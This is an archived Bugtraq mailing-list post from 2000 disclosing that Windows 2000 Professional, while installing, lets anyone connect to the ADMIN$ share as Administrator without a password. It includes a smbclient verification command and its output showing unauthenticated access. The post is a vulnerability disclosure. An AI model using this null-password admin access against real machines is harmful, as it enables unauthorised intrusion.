[13857] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Windows 2000 installation process weakness

daemon@ATHENA.MIT.EDU (Stephane Aubert)
Tue Feb 15 19:58:52 2000

Mail-Followup-To: BUGTRAQ@SECURITYFOCUS.COM
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-Id:  <20000215155750.M4500@safe.hsc.fr>
Date:         Tue, 15 Feb 2000 15:57:50 +0100
Reply-To: Stephane.Aubert@HSC.FR
From: Stephane Aubert <Stephane.Aubert@HSC.FR>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM

Hi !

During the installation process of Windows 2000 professionnal anyone
can connect to the ADMIN$ share as ADMINISTRATOR whithout any password.

Verification :

% ./smbclient \\\\WINDOZE\\ADMIN$ -I xxx.yyy.zzz.ttt -U 'administrator' -d 0 -N
Unable to open configuration file "/usr/local/samba/lib/smb.conf"!
pm_process retuned false
Can't load /usr/local/samba/lib/smb.conf - run testparm to debug it
Domain=[GROAR] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
smb: \>

Regards,
Stephane

PS : smbclient is a part of SAMBA (http://www.samba.org/).

--
Stephane AUBERT                   -=-      Herve Schauer Consultants
Stephane.Aubert@hsc.fr                            http://www.hsc.fr/


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[13857] in bugtraq

Windows 2000 installation process weakness

daemon@ATHENA.MIT.EDU (Stephane Aubert)Tue Feb 15 19:58:52 2000

daemon@ATHENA.MIT.EDU (Stephane Aubert)
Tue Feb 15 19:58:52 2000